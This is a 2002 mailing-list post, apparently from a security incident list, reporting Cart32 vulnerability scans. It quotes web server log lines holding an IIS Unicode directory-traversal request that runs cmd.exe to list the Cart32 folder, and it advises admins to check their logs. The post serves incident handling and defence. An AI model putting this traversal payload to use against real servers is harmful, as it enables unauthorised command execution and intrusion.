Hey, I get tons of cart32 scans on my machine. I've noticed that some scanners as using "smarter" methods of scanning a host for such files. Examples 202.95.138.6 - - [25/Feb/2002:11:15:46 -0500] "GET /snortcube.gif HTTP/1.0" 200 61988 "http://www.cgisecurity.com/archive/shop/cart32.txt/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)" 202.95.138.6 - - [25/Feb/2002:11:15:46 -0500] "GET /snortcube.gif HTTP/1.0" 200 61988 80.17.84.2 - - [25/Feb/2002:11:16:00 -0500] "GET /robots.txt HTTP/1.0" 200 19 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT; MS Search 4.0 Robot) Microsoft" 80.17.84.2 - - [25/Feb/2002:11:16:00 -0500] "GET /robots.txt HTTP/1.0" 200 19 202.95.138.6 - - [25/Feb/2002:11:16:12 -0500] "GET /archive/index.shtml HTTP/1.0" 200 4971 "http://www.cgisecurity.com/archive/shop/cart32.txt/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)" You'll notice it is trying any file or directory name with "cart32" for it being vulnerable. www.site/path/cart32.pdf for example will have an exploit appended to it like the one above. If you have cart32 installed and you have renamed it you may want to peek in your logs or perhaps rename it to not contain cart32 in it at all(do with caution) Also you will notice the request for robots.txt sequential (may be related perhaps) I've seen other scans using different exploits but I figured some people may be interested. - zenoat_private ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Feb 25 2002 - 13:23:33 PST